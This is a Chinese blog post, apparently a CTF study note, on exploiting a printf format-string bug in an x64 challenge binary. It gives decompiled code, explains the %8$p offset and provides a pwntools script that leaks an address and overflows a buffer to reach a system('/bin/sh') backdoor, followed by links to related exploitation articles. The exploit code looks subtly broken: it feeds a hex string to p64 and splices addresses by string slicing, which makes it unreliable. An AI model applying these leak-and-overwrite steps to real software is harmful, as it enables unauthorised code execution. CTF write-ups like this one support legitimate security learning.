pwn学习资料整理——x64中的printf回显漏洞

最新推荐文章于 2022-09-06 14:42:55 发布
最新推荐文章于 2022-09-06 14:42:55 发布
阅读量371 收藏 2
点赞数
分类专栏: CTF-PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31343581/article/details/119375479
版权

利用printf打印栈中内容

B站上有讲解有关printf回显栈数据的课程,但都是以x86为例,这次做题遇到x64架构下的相关漏洞,故做本次记录。

IDA伪代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[32]; // [rsp+0h] [rbp-30h] BYREF
  char buf[16]; // [rsp+20h] [rbp-10h] BYREF

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  puts("What's your name?");
  read(0, buf, 5uLL);
  buf[5] = 0;
  printf("Hello ");
  printf(buf);
  read(0, v4, 0x40uLL);
  return 0;
}
...
// 0x900
int win()
{
  return system("/bin/sh");
}

思路

利用printf回显得到偏移地址,在通过后门地址得到shell

过程

利用gdb查看printf处,查看栈中情况,根据esp位置计算得到我们想要的参数是第几个参数,但x64中参数位置计算有所区别。
在这里插入图片描述
上图可知,我们想要得到的0x55555555549f0距离rsp2个位置,但实际上我们需要填写的参数为%8$p来打印栈中该地址内容。
经大佬告知,64位程序传参顺序是前6个分别用rdi,rsi,rdx,rcx.r8,r9,故0x55555555549f0为第8个参数。

exp

from pwn import *
context.log_level='debug'
p=process('./pwn')
p.recvline("What's your name?")
p.sendline('%8$p')
base_main_addr = p.recvline()
win_addr = base_main_addr[-12:-3] + '900'
real_sys=hex(int(win_addr, 16))
payload='a'*0x30 + 'b'*8 + p64(real_sys)
p.sendline(payload)
p.interactive()

题目下载地址

pwn

recover517
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugkuCTF-PWNpwn6-printf超详细讲解(未提供Libc版本)
am_03的博客
08-31 1063
查看文件类型: 查看保护机制: IDA64位打开: 伪码: 查看子程序: case 2: case 3: case 1:
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
Pwnprintf漏洞
weixin_52553215的博客
03-10 1089
参考:https://bbs.pediy.com/thread-250858.htm Format String 介绍 1 printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999); 在上面这行语句, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串的 "%s" 对应
C++ x64printf诡异的潜规则
weixin_30341735的博客
10-24 71
先看图 32位下正常 64位就乱码了. 然后我把结构体里面的_buffer_length去掉,就是结构体里面只有一个指针,这样又正常了. x64的硬转指针有什么特殊规则?还是printfx64版本的读取参数跟32位不太一样? 2011/10/25 1:16 测试了一下发现并不是指针硬转什么的问题.而是变长参数在x64编译环境下读取出来的地址不对.但还是没查出...
CTF-PWN-printf(实验吧|格式化字符漏洞)
SuperGate的博客
02-01 3242
首先运行文件,发现需要输入name,于是打开ida逆向出正确的name,来到了程序主界面。 首先我们先逐一判断函数的用途。put_file是让我们输入文本名称和内容,get_file是让我们输入文本名称,然后程序输出文本内容。show_dir是按照先来后出输出所有的文本名称,并且无缝衔接。 这个时候我们发现get_file函数显然有一个格式化字符漏洞。 这种漏洞会导致我们可以控制任意内存的...
pwn入门笔记(3)——printf漏洞调试
weixin_45551695的博客
07-28 535
printf 在C语言,我们经常使用各种函数来进行输出操作 printf,fprintf,vprintf,vfprintf,sprint等, 其Fomat String是其第一个参数,我们一般称之为格式化字符串 printf 接受变长的参数,其第一个参数为格式化字符串,后面的参数在实际运行时将与格式化字符串特定格式的子字符串进行对应,将格式化字符串的特定子串,解析为相应的参数值。 解析 我们都知道printf在执行的时候,首先进行格式化字符串的解析,,从栈或者寄存器获取参数并与符号说明相匹配,然
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
pwn学习总结(八)—— 堆(持续更新)
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用(分配后)空闲(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
Pwn学习路线及学习笔记以及gem安装
10-15
本文将从Pwn学习路线及学习笔记入手,总结作者在学习Pwn过程的心得体会和经验。 一、前期知识铺垫 在学习Pwn之前,需要铺垫一些基础知识。《汇编语言》是Pwn学习的必备知识之一。作者建议从王爽老师的《汇编语言...
pwn笔记 - ret2text - 函数传参(x86&x64
weixin_44227244的博客
09-06 3182
pwn笔记 - ret2text - 函数传参
[PWN][基础篇]printf漏洞介绍
网络安全知识分享
03-20 5088
printf漏洞介绍1、概念2、漏洞成因 1、概念 printf接受变长的参数,其第一个参数为格式化字符串,后面的参数在实际运行时将与格式化字符串特定的子字符串进行对应,将格式化字符串的特定字串,解析为相应的参与值。格式化字符串就是%这种。 2、漏洞成因 printf函数在执行时,首先进行格式化字符串的解析–从栈(或者寄存器)获取参数并与符号说明进行匹配,然后将匹配的结果输出到屏幕上,那么 ,如果格式化字符串的符号声明与栈上参数不能正确匹配,比如参数个数少于符号声明个数时,就会造成泄漏。 而本书,p
hctf[pwn]babyprintf_ver2
九层台
11-15 803
0x01程序分析 程序给出了data段的地址,然后允许向这个地址处输入0x1ff个字节。 这个data段到底存的是什么呢? pwndbg> print $rbx + $rax $1 = 0x555555756011 pwndbg> x /50xg 0x555555756011 0x555555756011: 0x7200676664647364 0x200000000000646c ...
[pwn]关于printf输出时机的坑
Breeze的博客
08-26 8311
关于printf输出时机的坑 今天遇到了一个特别有意思的题,本来很简单的利用,但一直没有算出来,最后发现是一个很简单的却很细节的问题。 welpwn详细writeup 题目地址:welpwn 首先查看一下安全策略: 保护很少,然后看一下代码逻辑: read读入了0x400个字节,一般这么长必有溢出,注意echo并不是系统函数,查看echo逻辑: s2只有16个字节,但却复制了一个0x400字...
[PWN][基础篇]如何利用printf漏洞突破canary保护
网络安全知识分享
03-21 4009
如何利用printf漏洞突破canary保护 使用的实例代码如下 为了配合本次实例的教学,大家在编译时,不加pie保护,加cannary保护,整个的流程就是,分析程序之后,编写exp,利用printf漏洞(填充func函数,使其返回地址为exploit函数)来突破canary并且覆盖ret。 之后使用gdb开文件,查看func函数 来自英语白痴的小tip: 我们可以大概搞清楚func的流程,就是先read,然后printf,然后read,就是这样子。 我们下断就下到printf这里,我输入的测试用例是
pwn——x64下的格式化字符串
qq_41560595的博客
02-16 520
x64和x86在格式化字符串传参上稍有不同,原因在于x64会把printf函数的参数先传到6个寄存器。下面以一道例题说明。 链接:https://pan.baidu.com/s/1fgg6HRr__08fW1P0HgmaKA 提取码:1111 二进制文件拖入IDA并F5 代码吧啦吧啦一大堆,实际上就是让你猜一个flag和真正的flag比对,比对正确会给你flag。= =我要是都知道flag还要你的flag干嘛?! gdb调试 断点断在_isoc99_scanf处,输入AAAA。调试到printf时,查
CTFWiki-pwn
qq_55233040的博客
05-03 1334
stackoverflow ret2text 首先checksec一下,是32位可执行文件,没有开启保护 放入ida,shift+f12查看字符串,发现secure函数使用system函数调用了"/bin/sh",记下地址0x804863a 查看偏移地址 脚本如下: from pwn import * io = process("./ret2text") payload = b"a"*112 + p32(0x804863a) io.sendline(payload) io.interactive(
PWN简单堆栈溢出漏洞利用(二)
SkYe's Blog
08-12 784
PWN简单堆栈溢出漏洞利用(二) 题目来源 下载链接(密码akcz) 题目需要读取flag文件才能正确显示出flag,也就是下文显示的 This is flag 创建办法: 在/home/pwn/pwn1目录下创建一个名为flag文件,打开并写入This is flag 1. 运行程序、查看文件类型、保护措施 程序让我们输入一段字符串,并返回我们所输入的内容。 看到是一个 32位 动态链...
linux调用system参数格式化,湖湘杯2017 PWN 200格式化字符串漏洞详细WriteUp
weixin_35948624的博客
05-12 203
*本文涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。格式化字符串漏洞原理pwn,有形如下述代码的形式就是格式化字符串漏洞charstr[100];scarf("%s",str);printf(str)也许使用者的目的只是直接输出字符串,但是这段字符串来源于可控的输入,就造成了漏洞。示例程序如下编译:gcc -m32 -o str...
pwn printf 泄露
最新发布
08-19
在软件安全领域,pwn printf泄露通常指的是利用漏洞来泄露程序的敏感信息,这通常是通过格式化字符串漏洞实现的。 格式化字符串漏洞可以让攻击者读取内存的任意数据,包括程序的敏感信息。攻击者可以通过控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值